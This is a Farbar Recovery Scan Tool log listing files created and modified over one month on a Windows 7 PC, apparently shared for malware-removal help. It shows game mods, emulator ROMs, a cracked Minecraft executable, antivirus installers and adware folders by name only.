2013-08-18 17:32 - 2013-07-09 06:53 - 01292192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2013-08-18 17:32 - 2013-07-09 06:52 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2013-08-18 17:32 - 2013-07-09 04:49 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2013-08-18 17:32 - 2013-07-09 04:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2013-08-18 17:32 - 2013-07-09 04:49 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2013-08-18 17:32 - 2013-07-09 04:49 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2013-08-18 17:18 - 2013-08-18 17:26 - 133456378 _____ C:\Users\Niklas\Downloads\Dragon Quest IX Hüter Des Himmels.rar
2013-08-18 14:16 - 2013-08-18 14:16 - 02717364 _____ C:\Users\Niklas\Downloads\TwilightForest Mod 1.5.2.zip
2013-08-18 14:02 - 2013-07-09 07:52 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2013-08-18 14:02 - 2013-07-09 07:46 - 01472512 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2013-08-18 14:02 - 2013-07-09 07:46 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2013-08-18 14:02 - 2013-07-09 07:46 - 00139776 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2013-08-18 14:02 - 2013-07-09 06:52 - 00175104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2013-08-18 14:02 - 2013-07-09 06:46 - 01166848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2013-08-18 14:02 - 2013-07-09 06:46 - 00140288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2013-08-18 14:02 - 2013-07-09 06:46 - 00103936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2013-08-18 14:01 - 2013-07-19 03:58 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2013-08-18 14:01 - 2013-07-19 03:41 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2013-08-18 14:00 - 2013-07-25 11:25 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2013-08-18 14:00 - 2013-07-09 07:51 - 01217024 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2013-08-18 14:00 - 2013-07-09 06:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2013-08-18 14:00 - 2013-07-06 08:03 - 01910208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2013-08-18 14:00 - 2013-06-15 06:32 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2013-08-17 14:07 - 2013-08-17 14:07 - 00000000 ____D C:\Users\Niklas\Desktop\Neuer Ordner
2013-08-17 13:56 - 2013-08-17 13:56 - 00148503 _____ C:\Users\Niklas\Downloads\ForceOP.zip
2013-08-17 13:32 - 2013-08-17 13:34 - 34632602 _____ C:\Users\Niklas\Downloads\secondlwjgl5.rar
2013-08-17 12:52 - 2013-08-17 12:58 - 25730157 _____ C:\Users\Niklas\Downloads\0389 - Animal Crossing - Wild World (E)(M5).rar
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\ProgramData\AskPartnerNetwork
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\Program Files (x86)\AskPartnerNetwork
2013-08-16 14:32 - 2013-08-16 14:34 - 04570948 _____ C:\Users\Niklas\Desktop\video-2013-08-15-11-52-52.mp4
2013-08-15 19:02 - 2013-08-15 19:09 - 14409496 _____ C:\Users\Niklas\Downloads\DOS+WIN31 Floppies.rar
2013-08-15 17:37 - 2013-08-15 17:46 - 00000074 _____ C:\Users\Niklas\Desktop\wdw.html
2013-08-15 15:58 - 2013-08-15 15:58 - 00293672 _____ C:\Users\Niklas\Downloads\jsoup-1.7.2.jar
2013-08-15 15:53 - 2013-08-15 15:54 - 03449936 _____ C:\Users\Niklas\Downloads\httpcomponents-client-4.2.5-bin.zip
2013-08-15 13:53 - 2013-07-25 10:57 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2013-08-13 19:53 - 2013-08-15 20:42 - 00000125 _____ C:\Users\Niklas\Desktop\codes.php
2013-08-13 13:20 - 2013-08-13 13:36 - 00000265 _____ C:\Users\Niklas\Desktop\index.html
2013-08-13 11:43 - 2008-09-02 14:14 - 134217728 _____ C:\Users\Niklas\Desktop\Final Fantasy IV.nds
2013-08-13 11:20 - 2013-08-13 11:42 - 85929189 _____ C:\Users\Niklas\Downloads\Final Fantasy IV.rar
2013-08-05 18:47 - 2013-08-05 18:56 - 208666624 _____ C:\Users\Niklas\Downloads\android-x86-4.3-20130725.iso
2013-08-05 18:34 - 2013-08-05 19:49 - 00000000 ____D C:\Users\Niklas\Desktop\bios
2013-08-05 18:23 - 2013-08-05 18:31 - 205650432 _____ C:\Users\Niklas\Downloads\androVM_vbox86t_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 18:10 - 2013-08-15 19:08 - 00000000 ____D C:\Users\Niklas\VirtualBox VMs
2013-08-05 18:00 - 2013-08-05 18:09 - 208321536 _____ C:\Users\Niklas\Downloads\androVM_vbox86p_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 17:59 - 2013-08-16 14:04 - 00000000 ____D C:\Users\Niklas\.VirtualBox
2013-08-05 17:57 - 2013-08-05 17:57 - 00001080 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk
2013-08-05 17:57 - 2013-07-04 15:58 - 00238352 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys
2013-08-05 17:57 - 2013-07-04 15:57 - 00120080 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSBMon.sys
2013-08-05 17:49 - 2013-08-05 17:53 - 99776784 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\VirtualBox-4.2.16-86992-Win.exe
2013-08-05 17:43 - 2013-08-05 17:44 - 08924620 _____ C:\Users\Niklas\Downloads\AndroVMplayer-Win64-20130208.zip
2013-08-05 16:45 - 2013-08-05 16:45 - 00001811 _____ C:\Users\Public\Desktop\Start BlueStacks.lnk
2013-08-05 16:45 - 2013-08-05 16:45 - 00001784 _____ C:\Users\Public\Desktop\Apps.lnk
2013-08-05 16:44 - 2013-08-05 17:32 - 00000000 ____D C:\Program Files (x86)\BlueStacks
2013-08-05 16:44 - 2013-08-05 16:44 - 00000000 ____D C:\ProgramData\BlueStacks
2013-08-05 16:27 - 2013-08-05 16:27 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Niklas\Downloads\revosetup95.exe
2013-08-05 16:27 - 2013-08-05 16:27 - 00001268 _____ C:\Users\Niklas\Desktop\Revo Uninstaller.lnk
2013-08-05 16:27 - 2013-08-05 16:27 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2013-08-05 16:06 - 2013-08-05 16:06 - 09174000 _____ (BlueStack Systems Inc.) C:\Users\Niklas\Downloads\BlueStacks-SplitInstaller_native_0.7.16.exe
2013-08-02 17:53 - 2013-08-02 17:55 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (2).exe
2013-08-02 17:14 - 2013-08-02 17:14 - 00001166 _____ C:\Windows\wininit.ini
2013-07-31 18:41 - 2013-07-31 18:42 - 08086972 _____ C:\Users\Niklas\Desktop\Lan welt , N-M.rar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Downloads\MC_Open_Launcher (2).jar
2013-07-31 18:33 - 2013-07-31 18:33 - 00506821 _____ C:\Users\Niklas\Desktop\MC_Open_Launcher (2).jar
2013-07-31 18:30 - 2013-07-31 18:30 - 00000453 _____ C:\Users\Niklas\Downloads\mol.txt
2013-07-31 18:06 - 2013-07-31 18:06 - 00000083 _____ C:\Users\Niklas\Desktop\MOL_Properties.properties
2013-07-31 18:05 - 2013-07-31 18:05 - 00704826 _____ C:\Users\Niklas\Downloads\Minecraft 1.6.1.zip
2013-07-31 18:05 - 2013-07-02 22:15 - 00773177 _____ (Your Company) C:\Users\Niklas\Desktop\Minecraft 1.6.1 CRACK.exe
2013-07-31 17:50 - 2013-07-31 17:50 - 00352775 _____ C:\Users\Niklas\Downloads\OptiFine_1.5.2_HD_D5.zip
2013-07-31 15:51 - 2013-07-31 15:51 - 00097946 _____ C:\Users\Niklas\Downloads\TooManyItems2013_04_25_1.5.2 (3).zip
2013-07-31 15:27 - 2013-07-31 15:28 - 02014600 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.712.zip
2013-07-31 14:48 - 2013-07-31 14:48 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2013-07-31 14:26 - 2013-07-31 14:26 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\WinRAR
2013-07-31 14:00 - 2013-07-31 14:00 - 01758824 _____ C:\Users\Niklas\Downloads\winrar-x64-420d (1).exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00263592 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00175016 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2013-07-31 13:42 - 2013-07-31 13:41 - 00096168 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2013-07-31 13:41 - 2013-07-31 13:41 - 00000000 ____D C:\Program Files (x86)\Java
2013-07-31 13:40 - 2013-07-31 13:41 - 31714728 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-i586.exe
2013-07-31 13:37 - 2013-07-31 13:39 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64 (1).exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00312232 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00189352 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00188840 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2013-07-31 13:31 - 2013-07-31 13:30 - 00108968 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2013-07-31 13:28 - 2013-07-31 13:29 - 33150376 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\jre-7u25-windows-x64.exe
2013-07-31 13:19 - 2013-07-31 13:19 - 00903080 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\chromeinstall-7u25.exe
2013-07-31 13:14 - 2013-07-31 13:14 - 02033732 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.1.738.zip
2013-07-29 13:18 - 2013-08-13 10:15 - 00000000 ____D C:\Users\Niklas\AppData\Local\CrashDumps
2013-07-29 10:15 - 2013-08-22 11:18 - 00098358 _____ C:\Windows\PFRO.log
2013-07-28 19:13 - 2013-07-28 19:18 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Stella
2013-07-28 19:13 - 2013-07-28 19:13 - 01486815 _____ (The Stella Team                                             ) C:\Users\Niklas\Downloads\Stella-3.6-win32.exe
2013-07-28 19:13 - 2013-07-28 19:13 - 00000000 ____D C:\Program Files (x86)\Stella
2013-07-28 19:08 - 2013-07-28 19:08 - 00006628 _____ C:\Users\Niklas\Downloads\E.T. the Extra-Terrestrial.zip
2013-07-28 16:49 - 2013-07-28 16:49 - 00003000 _____ C:\{BE567149-6FEF-4828-835D-9A7A4805359B}
2013-07-28 16:43 - 2013-07-28 16:43 - 00000000 ____D C:\Windows\System32\Tasks\Norton Identity Safe
2013-07-28 14:25 - 2013-07-28 14:28 - 58909032 _____ (GIANTS Software                                             ) C:\Users\Niklas\Downloads\FarmingSimulator2013Patch1.4DE.exe
2013-07-27 18:15 - 2013-07-27 18:15 - 00237126 _____ C:\Users\Niklas\Downloads\Bankofhagenstedt.exe
2013-07-27 16:47 - 2013-07-27 16:49 - 07406374 _____ C:\Users\Niklas\Downloads\VeenhuisW400.exe
2013-07-27 15:35 - 2013-07-27 15:36 - 00000000 ____D C:\Users\Niklas\Documents\My Games
2013-07-27 15:28 - 2013-07-27 15:28 - 00001287 _____ C:\Users\Niklas\Desktop\Landwirtschafts Simulator 2013 .lnk
2013-07-27 15:25 - 2013-07-28 15:04 - 00000000 ____D C:\Program Files (x86)\Landwirtschafts Simulator 2013
2013-07-27 14:14 - 2013-07-27 14:14 - 00000000 ____D C:\Windows\System32\Tasks\Norton AntiVirus
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Windows\system32\Drivers\NSTx64
2013-07-27 14:12 - 2013-07-27 14:12 - 00000000 ____D C:\Program Files (x86)\Norton Identity Safe
2013-07-27 14:11 - 2013-08-13 10:25 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2013-07-27 14:11 - 2013-07-27 14:11 - 00003218 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2013-07-27 14:10 - 2013-08-13 12:42 - 00000000 ____D C:\ProgramData\Norton
2013-07-27 14:10 - 2013-07-27 14:10 - 00000000 ____D C:\Windows\system32\Drivers\NAVx64
2013-07-27 13:53 - 2013-07-27 14:00 - 186556480 ____N (Symantec Corporation) C:\Users\Niklas\Downloads\NAV-ESD-20-4-0-40-GE.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Downloads\Norton20_Removal_Tool.exe
2013-07-27 13:50 - 2013-07-27 13:50 - 00867880 _____ C:\Users\Niklas\Desktop\Norton20_Removal_Tool.exe
2013-07-26 20:32 - 2013-07-26 20:32 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (2).zip
2013-07-26 20:31 - 2013-07-26 20:32 - 01975130 _____ C:\Users\Niklas\Downloads\minecraftforge-universal-1.5.2-7.8.0.684 (1).zip
2013-07-26 20:06 - 2013-08-18 18:26 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\.minecraft
2013-07-26 19:38 - 2013-07-26 19:39 - 00695296 _____ (AnjoCaido) C:\Users\Niklas\Desktop\minecraftSP.exe
2013-07-26 19:24 - 2013-07-26 19:24 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\TrojanHunter
2013-07-26 19:16 - 2013-07-26 19:16 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (1).exe
2013-07-26 19:03 - 2013-07-26 19:03 - 00059392 ____R C:\Windows\SysWOW64\streamhlp.dll
2013-07-26 19:03 - 2013-07-26 19:03 - 00000000 ____D C:\ProgramData\TrojanHunter
2013-07-26 18:23 - 2013-07-26 18:23 - 04292608 _____ C:\Users\Niklas\Downloads\hamachi_2.1.0.362.msi
2013-07-26 18:14 - 2013-08-21 18:40 - 00000000 ____D C:\Program Files (x86)\System Explorer
2013-07-26 18:14 - 2013-07-27 23:36 - 00000000 ____D C:\ProgramData\SystemExplorer
2013-07-26 18:13 - 2013-07-26 18:14 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422.exe
2013-07-26 14:34 - 2013-07-26 14:34 - 00137266 _____ C:\Users\Niklas\Downloads\elegant.sit
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant.zip
2013-07-26 14:34 - 2013-07-26 14:34 - 00045185 _____ C:\Users\Niklas\Downloads\elegant (1).zip
2013-07-26 14:31 - 2013-07-26 14:31 - 00029060 _____ C:\Users\Niklas\Downloads\Acens.ttf
2013-07-26 09:34 - 2013-08-22 11:18 - 00001904 _____ C:\Windows\setupact.log
2013-07-26 09:34 - 2013-07-26 19:42 - 00633296 _____ C:\Windows\system32\FNTCACHE.DAT
2013-07-26 09:34 - 2013-07-26 09:34 - 00000000 _____ C:\Windows\setuperr.log
2013-07-25 17:36 - 2013-07-25 17:36 - 00000000 ____D C:\Users\Niklas\AppData\Local\{C938435F-A241-4E9B-80FC-B5E38F7C91FB}
2013-07-25 17:33 - 2013-07-25 17:33 - 00177672 _____ C:\Users\Niklas\Desktop\music1.OGG
2013-07-25 16:58 - 2013-07-25 16:59 - 10627171 _____ C:\Users\Niklas\Documents\lib.rar
2013-07-25 16:54 - 2013-07-25 16:55 - 01981647 _____ C:\Users\Niklas\Documents\minecraftforge-universal-1.5.2-7.8.0.686.zip
2013-07-25 14:38 - 2013-07-25 14:39 - 00570109 _____ C:\Users\Niklas\Downloads\billy-argel_beyond-sky.zip
2013-07-25 13:45 - 2013-07-25 13:45 - 00031788 _____ C:\Users\Niklas\Downloads\thump (1).wav
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo.jnlp
2013-07-25 11:04 - 2013-07-25 11:04 - 00002457 _____ C:\Users\Niklas\Downloads\TextFieldDemo (1).jnlp
2013-07-23 14:48 - 2013-07-27 13:42 - 00195816 _____ C:\Users\Niklas\AppData\Local\GDIPFONTCACHEV1.DAT
2013-07-23 14:01 - 2013-07-23 14:05 - 80978288 _____ (Intel(R) Corporation) C:\Users\Niklas\Downloads\Wireless_15.3.1_s64.exe
2013-07-23 12:48 - 2013-07-23 12:49 - 04891155 _____ C:\Users\Niklas\Downloads\Eminent.tip
2013-07-23 12:46 - 2013-07-27 23:36 - 00000000 ___HD C:\Windows\Icons
2013-07-23 12:46 - 2013-07-23 12:46 - 01958858 _____ C:\Users\Niklas\Downloads\FarawayDream.tip
2013-07-23 12:25 - 2013-07-23 12:26 - 04396440 _____ (Piriform Ltd) C:\Users\Niklas\Downloads\ccsetup403.exe
2013-07-23 12:03 - 2013-07-23 12:04 - 02918488 _____ (Martin Malík - REALiX                                       ) C:\Users\Niklas\Downloads\hw64_420.exe
2013-07-23 10:41 - 2013-07-23 10:43 - 19067867 _____ C:\Users\Niklas\Downloads\omnimo_5_0_for_rainmeter_by_fediafedia.zip
2013-07-23 10:41 - 2013-07-23 10:41 - 05209550 _____ C:\Users\Niklas\Downloads\Omnimo Screenshots - Imgur.zip
2013-07-23 10:36 - 2013-07-23 21:33 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Rainmeter
2013-07-23 10:35 - 2013-07-23 10:35 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\IObit
2013-07-23 10:23 - 2013-07-23 11:01 - 00000000 ____D C:\Windows\UXBackup
2013-07-23 10:20 - 2013-07-23 10:20 - 01386624 _____ C:\Users\Niklas\Downloads\Rainmeter-2.5.exe
2013-07-23 10:14 - 2013-07-23 10:20 - 61091169 _____ C:\Users\Niklas\Downloads\8TP7.zip
2013-07-23 10:12 - 2013-07-23 10:12 - 04685607 _____ C:\Users\Niklas\Downloads\Minecraft-Modpack_1.6.2.zip

==================== One Month Modified Files and Folders =======

2013-08-22 11:31 - 2013-08-22 11:31 - 00000000 ____D C:\FRST
2013-08-22 11:29 - 2013-08-22 11:31 - 01576476 _____ (Farbar) C:\Users\Niklas\Desktop\FRST64.exe
2013-08-22 11:29 - 2013-08-22 11:29 - 01576476 _____ (Farbar) C:\Users\Niklas\Downloads\FRST64.exe
2013-08-22 11:28 - 2012-08-11 11:41 - 00000346 ____H C:\Windows\Tasks\WxDFastUpdaterTask{3C1BA1D8-EAAE-42BB-9BC9-85A27908B34F}.job
2013-08-22 11:27 - 2009-07-14 06:45 - 00024400 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2013-08-22 11:27 - 2009-07-14 06:45 - 00024400 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2013-08-22 11:21 - 2012-07-21 21:08 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Skype
2013-08-22 11:21 - 2012-01-19 09:26 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2013-08-22 11:21 - 2012-01-19 09:26 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2013-08-22 11:18 - 2013-07-29 10:15 - 00098358 _____ C:\Windows\PFRO.log
2013-08-22 11:18 - 2013-07-26 09:34 - 00001904 _____ C:\Windows\setupact.log
2013-08-22 11:18 - 2012-08-11 11:42 - 00000328 ____H C:\Windows\Tasks\GBoxUpdaterTask{131876AC-419C-40EF-98DD-8C8C18A85D0B}.job
2013-08-22 11:18 - 2011-10-27 21:34 - 00000000 ____D C:\ProgramData\NVIDIA
2013-08-22 11:18 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2013-08-21 20:44 - 2012-01-19 09:24 - 01587206 _____ C:\Windows\WindowsUpdate.log
2013-08-21 18:48 - 2013-08-21 18:48 - 00003836 _____ C:\Users\Niklas\Downloads\fgjmgaonhcgbelpohkmegjaneegiigil.crx
2013-08-21 18:43 - 2013-08-21 18:42 - 00266843 _____ C:\ProgramData\GBox.rar
2013-08-21 18:40 - 2013-08-21 18:40 - 00001090 _____ C:\Users\Public\Desktop\System Explorer.lnk
2013-08-21 18:40 - 2013-07-26 18:14 - 00000000 ____D C:\Program Files (x86)\System Explorer
2013-08-21 18:36 - 2013-08-21 18:36 - 02061008 _____ (Mister Group                                                ) C:\Users\Niklas\Downloads\SystemExplorerSetup_422 (2).exe
2013-08-21 18:27 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2013-08-21 18:26 - 2011-10-28 14:11 - 00769402 _____ C:\Windows\system32\perfh007.dat
2013-08-21 18:26 - 2011-10-28 14:11 - 00176100 _____ C:\Windows\system32\perfc007.dat
2013-08-21 18:26 - 2009-07-14 07:13 - 01816170 _____ C:\Windows\system32\PerfStringBackup.INI
2013-08-21 14:37 - 2013-08-21 14:33 - 00000000 ____D C:\Users\Niklas\Desktop\php
2013-08-21 14:37 - 2012-09-23 18:06 - 00000000 ____D C:\Users\Niklas\AppData\Local\Eclipse
2013-08-21 14:32 - 2013-08-21 14:25 - 148380279 _____ C:\Users\Niklas\Downloads\eclipse-php-helios-SR2-win32-x86_64.zip
2013-08-21 13:39 - 2013-08-21 13:39 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\Avira
2013-08-21 13:34 - 2013-08-21 13:34 - 00083672 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avnetflt.sys
2013-08-21 13:33 - 2013-08-21 13:33 - 00001998 _____ C:\Users\Public\Desktop\Avira Control Center.lnk
2013-08-21 13:32 - 2013-08-21 13:32 - 00000000 ____D C:\Program Files (x86)\Avira
2013-08-21 13:32 - 2012-01-19 19:52 - 00000000 ____D C:\ProgramData\Avira
2013-08-18 23:26 - 2013-02-11 20:52 - 00000000 ____D C:\Users\Niklas\.android
2013-08-18 23:26 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2013-08-18 23:25 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\registration
2013-08-18 23:23 - 2012-12-11 16:24 - 00000000 ____D C:\Users\Niklas\Desktop\java
2013-08-18 18:31 - 2013-07-20 23:28 - 00000000 ____D C:\Windows\system32\MRT
2013-08-18 18:28 - 2011-10-27 23:06 - 78161360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2013-08-18 18:26 - 2013-07-26 20:06 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\.minecraft
2013-08-18 17:26 - 2013-08-18 17:18 - 133456378 _____ C:\Users\Niklas\Downloads\Dragon Quest IX Hüter Des Himmels.rar
2013-08-18 14:16 - 2013-08-21 13:32 - 00130016 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avipbb.sys
2013-08-18 14:16 - 2013-08-21 13:32 - 00100712 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avgntflt.sys
2013-08-18 14:16 - 2013-08-21 13:32 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\avkmgr.sys
2013-08-18 14:16 - 2013-08-18 14:16 - 02717364 _____ C:\Users\Niklas\Downloads\TwilightForest Mod 1.5.2.zip
2013-08-18 13:48 - 2012-07-26 17:34 - 00000000 ____D C:\Windows\System32\Tasks\NCH Software
2013-08-18 13:48 - 2012-01-19 09:32 - 00000000 ___RD C:\Users\Niklas
2013-08-17 14:07 - 2013-08-17 14:07 - 00000000 ____D C:\Users\Niklas\Desktop\Neuer Ordner
2013-08-17 13:56 - 2013-08-17 13:56 - 00148503 _____ C:\Users\Niklas\Downloads\ForceOP.zip
2013-08-17 13:34 - 2013-08-17 13:32 - 34632602 _____ C:\Users\Niklas\Downloads\secondlwjgl5.rar
2013-08-17 12:58 - 2013-08-17 12:52 - 25730157 _____ C:\Users\Niklas\Downloads\0389 - Animal Crossing - Wild World (E)(M5).rar
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\ProgramData\AskPartnerNetwork
2013-08-17 12:33 - 2013-08-17 12:33 - 00000000 ____D C:\Program Files (x86)\AskPartnerNetwork
2013-08-16 14:34 - 2013-08-16 14:32 - 04570948 _____ C:\Users\Niklas\Desktop\video-2013-08-15-11-52-52.mp4
2013-08-16 14:04 - 2013-08-05 17:59 - 00000000 ____D C:\Users\Niklas\.VirtualBox
2013-08-16 13:40 - 2011-10-27 22:13 - 00000000 ____D C:\Windows\Panther
2013-08-15 20:42 - 2013-08-13 19:53 - 00000125 _____ C:\Users\Niklas\Desktop\codes.php
2013-08-15 20:42 - 2013-02-10 20:45 - 00000000 ____D C:\Users\Niklas\AppData\Roaming\FileZilla
2013-08-15 19:09 - 2013-08-15 19:02 - 14409496 _____ C:\Users\Niklas\Downloads\DOS+WIN31 Floppies.rar
2013-08-15 19:08 - 2013-08-05 18:10 - 00000000 ____D C:\Users\Niklas\VirtualBox VMs
2013-08-15 17:46 - 2013-08-15 17:37 - 00000074 _____ C:\Users\Niklas\Desktop\wdw.html
2013-08-15 15:58 - 2013-08-15 15:58 - 00293672 _____ C:\Users\Niklas\Downloads\jsoup-1.7.2.jar
2013-08-15 15:54 - 2013-08-15 15:53 - 03449936 _____ C:\Users\Niklas\Downloads\httpcomponents-client-4.2.5-bin.zip
2013-08-13 13:36 - 2013-08-13 13:20 - 00000265 _____ C:\Users\Niklas\Desktop\index.html
2013-08-13 12:42 - 2013-07-27 14:10 - 00000000 ____D C:\ProgramData\Norton
2013-08-13 11:42 - 2013-08-13 11:20 - 85929189 _____ C:\Users\Niklas\Downloads\Final Fantasy IV.rar
2013-08-13 10:25 - 2013-07-27 14:11 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2013-08-13 10:15 - 2013-07-29 13:18 - 00000000 ____D C:\Users\Niklas\AppData\Local\CrashDumps
2013-08-05 19:49 - 2013-08-05 18:34 - 00000000 ____D C:\Users\Niklas\Desktop\bios
2013-08-05 18:56 - 2013-08-05 18:47 - 208666624 _____ C:\Users\Niklas\Downloads\android-x86-4.3-20130725.iso
2013-08-05 18:31 - 2013-08-05 18:23 - 205650432 _____ C:\Users\Niklas\Downloads\androVM_vbox86t_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 18:09 - 2013-08-05 18:00 - 208321536 _____ C:\Users\Niklas\Downloads\androVM_vbox86p_4.1.1_r4-20121119-gapps-houdini-flash.ova
2013-08-05 17:57 - 2013-08-05 17:57 - 00001080 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk
2013-08-05 17:57 - 2012-08-14 18:56 - 00000000 ____D C:\Program Files\Oracle
2013-08-05 17:53 - 2013-08-05 17:49 - 99776784 _____ (Oracle Corporation) C:\Users\Niklas\Downloads\VirtualBox-4.2.16-86992-Win.exe
2013-08-05 17:44 - 2013-08-05 17:43 - 08924620 _____ C:\Users\Niklas\Downloads\AndroVMplayer-Win64-20130208.zip
2013-08-05 17:32 - 2013-08-05 16:44 - 00000000 ____D C:\Program Files (x86)\BlueStacks
2013-08-05 16:45 - 2013-08-05 16:45 - 00001811 _____ C:\Users\Public\Desktop\Start BlueStacks.lnk
2013-08-05 16:45 - 2013-08-05 16:45 - 00001784 _____ C:\Users\Public\Desktop\Apps.lnk
2013-08-05 16:45 - 2009-07-14 05:20 - 00000000 __RHD C:\Users\Public\Libraries
2013-08-05 16:44 - 2013-08-05 16:44 - 00000000 ____D C:\ProgramData\BlueStacks
2013-08-05 16:44 - 2013-07-22 11:11 - 00000000 ____D C:\ProgramData\BlueStacksSetup
2013-08-05 16:27 - 2013-08-05 16:27 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Niklas\Downloads\revosetup95.exe
2013-08-05 16:27 - 2013-08-05 16:27 - 00001268 _____ C:\Users\Niklas\Desktop\Revo Uninstaller.lnk
2013-08-05 16:27 - 2013-08-05 16:27 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2013-08-05 16:06 - 2013-08-05 16:06 - 09174000 _____ (BlueStack Systems Inc.) C:\Users\Niklas\Downloads\BlueStacks-SplitInstaller_native_0.7.16.exe
2013-08-04 19:51 - 2012-03-28 18:29 - 00003704 _____ C:\Windows\System32\Tasks\Java Update Scheduler
